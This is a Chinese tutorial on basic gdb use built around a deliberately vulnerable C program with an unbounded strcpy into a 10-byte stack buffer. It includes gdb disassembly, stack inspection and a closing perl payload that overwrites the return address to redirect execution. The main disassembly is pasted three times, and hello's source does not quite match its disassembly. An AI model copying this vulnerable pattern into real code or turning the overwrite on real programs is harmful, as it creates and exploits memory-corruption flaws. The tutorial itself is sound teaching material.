gdb简单使用


#include <stdio.h>  
#include <string.h>  
/*
 * hello - writes "hello" plus a newline to stdout.
 *
 * Takes no arguments and returns nothing.  main() never calls it; in this
 * walkthrough it exists only as the jump target whose text address
 * (0x40057d in the disassembly below, a non-PIE binary) is written over
 * fun()'s saved return address by the final payload.
 */
void hello()
{
        fputs("hello\n", stdout);
}
  
/*
 * fun - copies the caller-supplied string into a fixed 10-byte stack
 * buffer and prints it.  Always returns 0.
 *
 * DELIBERATELY VULNERABLE - this is the subject of the tutorial, so the
 * code is left exactly as is.  strcpy() performs no bounds check, so any
 * argument of 10 or more characters (plus the terminating NUL) overruns
 * buf.  In the disassembly below buf lives at rbp-0x10; the 8 bytes above
 * it are the saved rbp and the 8 bytes above that are the return address.
 * Hence input bytes 17-24 clobber the saved rbp and bytes 25-32 clobber
 * the return address, which is exactly what the final payload exploits.
 * Nothing in this frame checks a stack canary (no %fs:0x28 access in the
 * disassembly), so the overwrite is not detected.
 * Never copy this pattern into real code: a bounded copy such as
 * snprintf(buf, sizeof buf, "%s", str) would close the hole.
 */
int fun(char *str)  
{  
        char buf[10];  
        strcpy(buf, str);  
        printf("%s\n", buf);  
        return 0;  
}  
  
/*
 * main - forwards argv[1] to fun() unchanged and returns 0.
 *
 * argv[1] is read unconditionally ("mov 0x8(%rax),%rax" in the
 * disassembly), so running the binary with no argument hands a NULL
 * pointer to strcpy(), which will almost certainly crash.  No length
 * check is performed here either; the whole argument reaches fun(),
 * which is what lets an over-long argv[1] smash fun()'s frame.
 * The unused local `i` is what occupies the -0x4(%rbp) slot in the
 * disassembly; it is kept so the frame layout matches the transcript.
 */
int main(int argc, char **argv)  
{  
        int i=0;  
        char *str;  
        str=argv[1];  
        fun(str);  
        return 0;  
}  


编译test.c(加 -g 以便 gdb 能按源码行号设置断点)
gcc -g -o test test.c
注意:本文后面的溢出实验依赖两个前提——可执行文件不是 PIE(下面反汇编里的地址是固定的 0x400xxx,hello 的地址可以直接写进载荷),并且 fun 的栈帧没有 canary(反汇编中没有对 %fs:0x28 的读写)。在默认开启 PIE 和 -fstack-protector 的发行版上,需要改用 gcc -g -fno-stack-protector -no-pie -o test test.c 编译,否则最后的载荷会被 canary 检查拦下或者目标地址随机化而失效。
 
gdb test
反汇编hello、fun、main这三个函数

(gdb) disass hello
Dump of assembler code for function hello:
0x000000000040057d <+0>: push %rbp
0x000000000040057e <+1>: mov %rsp,%rbp
0x0000000000400581 <+4>: mov $0x400690,%edi
0x0000000000400586 <+9>: callq 0x400460 <puts@plt>
0x000000000040058b <+14>: pop %rbp
0x000000000040058c <+15>: retq
End of assembler dump.
(gdb) disass fun
Dump of assembler code for function fun:
0x000000000040058d <+0>: push %rbp
0x000000000040058e <+1>: mov %rsp,%rbp
0x0000000000400591 <+4>: sub $0x20,%rsp
0x0000000000400595 <+8>: mov %rdi,-0x18(%rbp)
0x0000000000400599 <+12>: mov -0x18(%rbp),%rdx
0x000000000040059d <+16>: lea -0x10(%rbp),%rax
0x00000000004005a1 <+20>: mov %rdx,%rsi
0x00000000004005a4 <+23>: mov %rax,%rdi
0x00000000004005a7 <+26>: callq 0x400450 <strcpy@plt>
0x00000000004005ac <+31>: lea -0x10(%rbp),%rax
0x00000000004005b0 <+35>: mov %rax,%rdi
0x00000000004005b3 <+38>: callq 0x400460 <puts@plt>
0x00000000004005b8 <+43>: mov $0x0,%eax
0x00000000004005bd <+48>: leaveq
0x00000000004005be <+49>: retq
End of assembler dump.
(gdb) disass main
Dump of assembler code for function main:
0x00000000004005bf <+0>: push %rbp
0x00000000004005c0 <+1>: mov %rsp,%rbp
0x00000000004005c3 <+4>: sub $0x20,%rsp
0x00000000004005c7 <+8>: mov %edi,-0x14(%rbp)
0x00000000004005ca <+11>: mov %rsi,-0x20(%rbp)
0x00000000004005ce <+15>: movl $0x0,-0x4(%rbp)
0x00000000004005d5 <+22>: mov -0x20(%rbp),%rax
0x00000000004005d9 <+26>: mov 0x8(%rax),%rax
0x00000000004005dd <+30>: mov %rax,-0x10(%rbp)
0x00000000004005e1 <+34>: mov -0x10(%rbp),%rax
0x00000000004005e5 <+38>: mov %rax,%rdi
0x00000000004005e8 <+41>: callq 0x40058d <fun>
0x00000000004005ed <+46>: mov $0x0,%eax
0x00000000004005f2 <+51>: leaveq
0x00000000004005f3 <+52>: retq
End of assembler dump.
(gdb)
Dump of assembler code for function main:
0x00000000004005bf <+0>: push %rbp
0x00000000004005c0 <+1>: mov %rsp,%rbp
0x00000000004005c3 <+4>: sub $0x20,%rsp
0x00000000004005c7 <+8>: mov %edi,-0x14(%rbp)
0x00000000004005ca <+11>: mov %rsi,-0x20(%rbp)
0x00000000004005ce <+15>: movl $0x0,-0x4(%rbp)
0x00000000004005d5 <+22>: mov -0x20(%rbp),%rax
0x00000000004005d9 <+26>: mov 0x8(%rax),%rax
0x00000000004005dd <+30>: mov %rax,-0x10(%rbp)
0x00000000004005e1 <+34>: mov -0x10(%rbp),%rax
0x00000000004005e5 <+38>: mov %rax,%rdi
0x00000000004005e8 <+41>: callq 0x40058d <fun>
0x00000000004005ed <+46>: mov $0x0,%eax
0x00000000004005f2 <+51>: leaveq
0x00000000004005f3 <+52>: retq
End of assembler dump.
(gdb)
Dump of assembler code for function main:
0x00000000004005bf <+0>: push %rbp
0x00000000004005c0 <+1>: mov %rsp,%rbp
0x00000000004005c3 <+4>: sub $0x20,%rsp
0x00000000004005c7 <+8>: mov %edi,-0x14(%rbp)
0x00000000004005ca <+11>: mov %rsi,-0x20(%rbp)
0x00000000004005ce <+15>: movl $0x0,-0x4(%rbp)
0x00000000004005d5 <+22>: mov -0x20(%rbp),%rax
0x00000000004005d9 <+26>: mov 0x8(%rax),%rax
0x00000000004005dd <+30>: mov %rax,-0x10(%rbp)
0x00000000004005e1 <+34>: mov -0x10(%rbp),%rax
0x00000000004005e5 <+38>: mov %rax,%rdi
0x00000000004005e8 <+41>: callq 0x40058d <fun>
0x00000000004005ed <+46>: mov $0x0,%eax
0x00000000004005f2 <+51>: leaveq
0x00000000004005f3 <+52>: retq
End of assembler dump.


(gdb) b 12
Breakpoint 1 at 0x4005ac: file test.c, line 12.
(gdb) b 21
Breakpoint 2 at 0x4005e1: file test.c, line 21.
(gdb) x/x $rsp
No registers.
(gdb) r AAAA
Starting program: /root/test AAAA

Breakpoint 2, main (argc=2, argv=0x7fffffffe4e8) at test.c:21
21 fun(str);
Missing separate debuginfos, use: debuginfo-install glibc-2.17-157.el7.x86_64
(gdb) x/x $rbp
0x7fffffffe400: 0x00000000
(gdb) x/x $rsp
0x7fffffffe3e0: 0xffffe4e8
(gdb) x/8x $rsp
0x7fffffffe3e0: 0xffffe4e8 0x00007fff 0x00400490 0x00000002
0x7fffffffe3f0: 0xffffe764 0x00007fff 0x00000000 0x00000000
(gdb) p str
$1 = 0x7fffffffe764 "AAAA"
(gdb) si
0x00000000004005e5 21 fun(str);
(gdb) x/8x $rsp
0x7fffffffe3e0: 0xffffe4e8 0x00007fff 0x00400490 0x00000002
0x7fffffffe3f0: 0xffffe764 0x00007fff 0x00000000 0x00000000
(gdb) si
0x00000000004005e8 21 fun(str);
(gdb) x/8x $rsp
0x7fffffffe3e0: 0xffffe4e8 0x00007fff 0x00400490 0x00000002
0x7fffffffe3f0: 0xffffe764 0x00007fff 0x00000000 0x00000000
(gdb) n

Breakpoint 1, fun (str=0x7fffffffe764 "AAAA") at test.c:12
12 printf("%s\n", buf);
(gdb) x/8x $rsp
0x7fffffffe3b0: 0x00000001 0x00000000 0xffffe764 0x00007fff
0x7fffffffe3c0: 0x41414141 0x00000000 0x0040064d 0x00000000
(gdb) x/16x $rsp
0x7fffffffe3b0: 0x00000001 0x00000000 0xffffe764 0x00007fff
0x7fffffffe3c0: 0x41414141 0x00000000 0x0040064d 0x00000000
0x7fffffffe3d0: 0xffffe400 0x00007fff 0x004005ed 0x00000000
0x7fffffffe3e0: 0xffffe4e8 0x00007fff 0x00400490 0x00000002


载荷长度的计算:在 fun 里 buf 位于 rbp-0x10(见 lea -0x10(%rbp),%rax),其上紧接着是 8 字节的保存 rbp,再上面是返回地址——x/16x 输出中 0x7fffffffe3d8 处的 0x004005ed,正是 main 中 callq fun 的下一条指令。因此 0x10 + 8 = 24 个 "A" 先填满 buf 和保存的 rbp,随后的 4 个字节 \x7d\x05\x40\x00 以小端序覆盖返回地址的低 32 位,使其变成 hello 的地址 0x40057d(高 32 位原本就是 0,不必再写)。由于跳转目标在非 PIE 的代码段、载荷里不含任何栈地址,ASLR 不影响这个例子。
./test `perl -e 'print "A"x24;print "\x7d\x05\x40\x00"'`
预期结果:fun 返回时跳到 hello,打印 "hello";随后 hello 自己的 ret 会弹出栈上残留的值(x/16x 中 0x7fffffffe3e0 处的 argv 指针)并跳过去,进程通常以段错误结束——这是预期现象,不代表载荷失败。另外 shell 在命令替换时会丢弃末尾的 \x00(较新的 bash 会提示 "ignored null byte"),但 strcpy 自己写入的终止符会落在同一位置,所以结果不变。